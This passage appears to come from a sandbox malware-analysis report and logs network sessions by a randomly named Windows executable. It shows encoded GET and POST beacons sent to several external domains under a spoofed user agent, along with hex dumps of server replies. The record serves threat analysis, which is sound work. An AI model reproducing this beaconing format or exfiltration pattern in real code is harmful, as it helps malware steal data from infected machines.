                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                      Sep 22, 2024 18:03:14.289772987 CEST224INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                      Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ...
                      Sep 22, 2024 18:03:14.290497065 CEST1236INData Raw: 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22
                      Data Ascii: OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="
                      Sep 22, 2024 18:03:14.290788889 CEST1236INData Raw: 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20
                      Data Ascii: id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color
                      Sep 22, 2024 18:03:14.290802002 CEST1236INData Raw: 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: /images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables
                      Sep 22, 2024 18:03:14.291783094 CEST672INData Raw: 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74
                      Data Ascii: r" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-
                      Sep 22, 2024 18:03:14.292109966 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                      Sep 22, 2024 18:03:14.292123079 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                      Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                      Sep 22, 2024 18:03:14.293227911 CEST1236INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                      Sep 22, 2024 18:03:14.293241978 CEST104INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 34 3c 2f 61 3e 0a
                      Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 4</a>
                      Sep 22, 2024 18:03:14.294626951 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header4-transparent.html">Header 4 Transparent</a></li>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.44974967.223.117.189801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:16.185085058 CEST475OUTGET /unks/?4rl8h=cdhJ2J1BF/3FP1t6JbliQByYvepm5n0GJvy2RzMWe/YhGvvDNzkKTft45HunghqbyAFMp5DD9OJS7Rih3uNIOlCSON0kvMqKINfWmh1G6LwRZZAk9zqDBj8=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.uburn.xyz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:16.780487061 CEST1236INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:16 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                      Sep 22, 2024 18:03:16.780683041 CEST1236INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                      Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
                      Sep 22, 2024 18:03:16.780698061 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e
                      Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
                      Sep 22, 2024 18:03:16.781568050 CEST672INData Raw: 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68
                      Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
                      Sep 22, 2024 18:03:16.781580925 CEST1236INData Raw: 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73
                      Data Ascii: t"> <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables N
                      Sep 22, 2024 18:03:16.782572985 CEST1236INData Raw: 72 2d 6e 61 76 20 6d 78 2d 61 75 74 6f 20 66 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69
                      Data Ascii: r-nav mx-auto fables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true" ari
                      Sep 22, 2024 18:03:16.782587051 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 46 65 61 74 75 72 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: Features </a> <ul class="dropdown-menu" aria-labelledby="sub-nav2"> <li><a class="dropdown-item dropdown-togg
                      Sep 22, 2024 18:03:16.782601118 CEST672INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 32 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 2</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                      Sep 22, 2024 18:03:16.783472061 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                      Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                      Sep 22, 2024 18:03:16.783488035 CEST1236INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                      Sep 22, 2024 18:03:16.786020041 CEST1236INData Raw: 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20
                      Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.44975085.159.66.93801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:21.999027014 CEST764OUTPOST /og3c/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sppsuperplast.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.sppsuperplast.online
                      Referer: http://www.sppsuperplast.online/og3c/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 43 4c 6b 74 34 42 6a 54 62 68 6a 71 65 64 69 6a 32 75 57 57 64 36 4d 50 57 41 65 66 5a 72 7a 57 64 70 41 30 5a 32 37 2f 2f 62 57 39 53 4b 50 69 58 45 7a 54 78 78 47 48 6c 72 48 73 6b 31 35 6e 4a 66 73 33 6a 75 78 69 6f 62 52 64 36 42 4f 43 50 35 76 4f 32 58 43 45 55 56 78 62 6b 71 63 52 79 4d 4e 53 55 53 6a 39 45 49 62 2f 67 38 77 4f 66 35 34 6f 2b 57 41 57 63 34 51 59 68 78 69 4c 58 39 41 64 45 5a 34 51 61 4c 61 54 6f 79 73 46 6e 4d 53 42 42 64 50 52 61 32 78 48 33 67 77 55 35 75 50 65 61 73 57 71 55 48 6f 75 51 39 59 63 31 58 70 2f 4f 2b 2b 41 4d 65 31 34 74 37 6d 35 51 51 3d 3d
                      Data Ascii: 4rl8h=CLkt4BjTbhjqedij2uWWd6MPWAefZrzWdpA0Z27//bW9SKPiXEzTxxGHlrHsk15nJfs3juxiobRd6BOCP5vO2XCEUVxbkqcRyMNSUSj9EIb/g8wOf54o+WAWc4QYhxiLX9AdEZ4QaLaToysFnMSBBdPRa2xH3gwU5uPeasWqUHouQ9Yc1Xp/O++AMe14t7m5QQ==


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.44975185.159.66.93801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:24.548738956 CEST784OUTPOST /og3c/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sppsuperplast.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.sppsuperplast.online
                      Referer: http://www.sppsuperplast.online/og3c/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 43 4c 6b 74 34 42 6a 54 62 68 6a 71 66 39 53 6a 36 74 75 57 66 61 4d 51 5a 67 65 66 43 37 7a 53 64 70 4d 30 5a 33 76 76 2f 6f 79 39 4c 72 54 69 57 47 4c 54 32 78 47 48 75 4c 48 6a 67 31 35 73 4a 66 67 2f 6a 73 31 69 6f 62 46 64 36 46 4b 43 50 4f 62 4a 30 48 43 47 66 31 78 64 75 4b 63 52 79 4d 4e 53 55 53 6e 44 45 49 54 2f 67 50 34 4f 65 62 51 76 69 47 41 56 55 59 51 59 6c 78 6a 4d 58 39 41 2f 45 59 55 71 61 4e 65 54 6f 33 41 46 6d 59 2b 47 55 4e 50 74 46 47 77 35 7a 79 4e 35 7a 37 71 78 63 4e 43 79 58 30 70 54 59 62 4a 47 6b 6d 49 6f 63 2b 61 7a 52 5a 38 4d 67 34 62 77 4c 58 65 71 36 51 4a 5a 63 6f 4d 76 42 48 72 2b 79 52 46 61 55 43 6b 3d
                      Data Ascii: 4rl8h=CLkt4BjTbhjqf9Sj6tuWfaMQZgefC7zSdpM0Z3vv/oy9LrTiWGLT2xGHuLHjg15sJfg/js1iobFd6FKCPObJ0HCGf1xduKcRyMNSUSnDEIT/gP4OebQviGAVUYQYlxjMX9A/EYUqaNeTo3AFmY+GUNPtFGw5zyN5z7qxcNCyX0pTYbJGkmIoc+azRZ8Mg4bwLXeq6QJZcoMvBHr+yRFaUCk=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.44975285.159.66.93801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:27.098366976 CEST10866OUTPOST /og3c/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sppsuperplast.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.sppsuperplast.online
                      Referer: http://www.sppsuperplast.online/og3c/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 43 4c 6b 74 34 42 6a 54 62 68 6a 71 66 39 53 6a 36 74 75 57 66 61 4d 51 5a 67 65 66 43 37 7a 53 64 70 4d 30 5a 33 76 76 2f 6f 36 39 58 4a 33 69 58 68 66 54 33 78 47 48 6a 72 47 6b 67 31 35 4c 4a 66 6f 37 6a 73 35 59 6f 59 39 64 37 67 65 43 4e 37 33 4a 75 58 43 47 51 56 78 63 6b 71 64 56 79 4d 64 57 55 53 33 44 45 49 54 2f 67 4f 49 4f 59 4a 34 76 67 47 41 57 63 34 51 71 68 78 6a 6f 58 39 49 46 45 59 51 36 61 2b 57 54 6f 54 67 46 6b 72 47 47 4a 39 50 76 45 47 77 78 7a 79 42 36 7a 2f 4b 58 63 4e 32 49 58 7a 5a 54 62 64 42 66 37 48 59 41 4a 39 43 57 4f 72 49 63 6e 4a 2f 33 51 48 71 78 31 6c 5a 43 4d 63 41 76 46 6e 79 50 71 6a 4a 59 4e 47 45 79 2b 76 50 76 47 77 52 39 62 2b 77 46 31 32 4c 44 39 73 62 41 7a 4a 42 72 48 66 5a 76 4f 39 68 50 65 4d 33 65 4a 4c 6b 65 33 32 59 68 46 42 4b 4a 6e 54 50 73 4c 39 70 58 31 4c 5a 36 54 47 64 58 32 64 4a 44 44 5a 62 59 6a 31 74 4c 4c 47 39 6c 41 33 30 56 6d 65 44 49 79 6e 58 78 43 75 4c 48 74 2f 67 4d 4e 54 58 66 72 31 50 4e 45 68 73 70 66 6a 52 6a [TRUNCATED]
                      Data Ascii: 4rl8h=CLkt4BjTbhjqf9Sj6tuWfaMQZgefC7zSdpM0Z3vv/o69XJ3iXhfT3xGHjrGkg15LJfo7js5YoY9d7geCN73JuXCGQVxckqdVyMdWUS3DEIT/gOIOYJ4vgGAWc4QqhxjoX9IFEYQ6a+WToTgFkrGGJ9PvEGwxzyB6z/KXcN2IXzZTbdBf7HYAJ9CWOrIcnJ/3QHqx1lZCMcAvFnyPqjJYNGEy+vPvGwR9b+wF12LD9sbAzJBrHfZvO9hPeM3eJLke32YhFBKJnTPsL9pX1LZ6TGdX2dJDDZbYj1tLLG9lA30VmeDIynXxCuLHt/gMNTXfr1PNEhspfjRj1UdIz5HBy3DyCr24Jkv9VDva0LIW+f6gsFVIGQEic56BV9s0vhch1bMtR6ZmmLdNb7vMAbQylJggkGN3qh7gAjbzLV8zYkc0rQfkfqPDnhGFWdThYpUn3s/qbU7JrSVeA8/ewzjv6/1FT4+i+skRPy9UeEtl4l4I8IdA4T9c3X0OPAY6x0cIwxjj5aq9LqT073QdiOesLuhBDyvQ4bo20wGRSLcurusQv+geGqsfA0foy11vjf+zuF/0mg/7nrXezkvdZSJtZSs7fUHJesTrPaAENyrnIdqxkBA9xgmi1H4R6n7Mr1KbmKCWvSGmJZbNLFnzciqJnMsws/Q/yjPTRUM/GzFKXwq/j4bIixX//wRLTv6fdEFQWmA2gIGsGF7yk7mcpkXYhufbc0UifLdMOOsAoWIS1s5bWg5ab+Z4eTRzFzwxRcAej7loIK7E3IqgZelyzQbtGb5HLQV19uFi3HMl04acnV6+wKoFCHhqYB8/2G+3PiFlF+K8dcJ8sCDTOxG8enf3KDxDu0pukjYpTCvTYIULVdIl1xW/c0LrjyvJ3QecGdNf3y/7qIRhQkYJi3UslVP06I0tlrZIbwXtVBQMxbCnkSPfXFUsu3/ds5uUBVtDqh8srlcYbNoJSBznULscR8sW8f5kXbYLPTaGKJ6197nj59oZuD [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.44975385.159.66.93801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:29.638155937 CEST486OUTGET /og3c/?4rl8h=PJMN73v+cS+JEOCp4MHXb74XFyLCcf/8AP5dNED26sKmApKDXWDqmSS3jfO80ER4JfpprrZAuqpt1wLlM7DUug2WU25CtLkRmct6bnS3AqTVtMg1RKgxnn8=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.sppsuperplast.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:30.374783039 CEST225INHTTP/1.1 404 Not Found
                      Server: nginx/1.14.1
                      Date: Sun, 22 Sep 2024 16:03:30 GMT
                      Content-Length: 0
                      Connection: close
                      X-Rate-Limit-Limit: 5s
                      X-Rate-Limit-Remaining: 19
                      X-Rate-Limit-Reset: 2024-09-22T16:03:35.2633987Z


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.449754208.91.197.27801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:35.697856903 CEST758OUTPOST /c45k/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.palcoconnector.net
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.palcoconnector.net
                      Referer: http://www.palcoconnector.net/c45k/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 35 2b 42 4e 66 51 39 43 32 46 54 44 37 75 58 75 37 4f 6a 6d 69 57 4f 69 41 6e 78 71 37 67 46 4e 59 65 63 44 2b 49 62 77 6a 36 37 42 58 45 69 68 76 66 6f 76 68 51 4c 56 52 76 42 2b 51 52 68 68 6c 58 36 34 67 4b 39 79 35 43 39 41 77 66 47 2b 61 7a 36 30 2f 57 32 61 4a 49 70 2b 52 57 78 78 46 76 49 4c 44 63 50 65 51 6d 54 53 4c 37 6e 2f 39 47 49 48 4d 6a 75 6a 54 36 2f 42 36 50 65 57 71 78 6d 42 67 79 55 47 62 33 47 45 61 4f 68 35 50 37 4a 58 42 78 56 74 47 68 4a 31 35 44 67 63 4f 30 63 6d 53 76 59 30 53 6d 75 67 44 4f 6e 54 57 2b 68 74 77 75 4a 54 2f 74 58 44 4e 43 68 68 6c 67 3d 3d
                      Data Ascii: 4rl8h=5+BNfQ9C2FTD7uXu7OjmiWOiAnxq7gFNYecD+Ibwj67BXEihvfovhQLVRvB+QRhhlX64gK9y5C9AwfG+az60/W2aJIp+RWxxFvILDcPeQmTSL7n/9GIHMjujT6/B6PeWqxmBgyUGb3GEaOh5P7JXBxVtGhJ15DgcO0cmSvY0SmugDOnTW+htwuJT/tXDNChhlg==


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.449755208.91.197.27801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
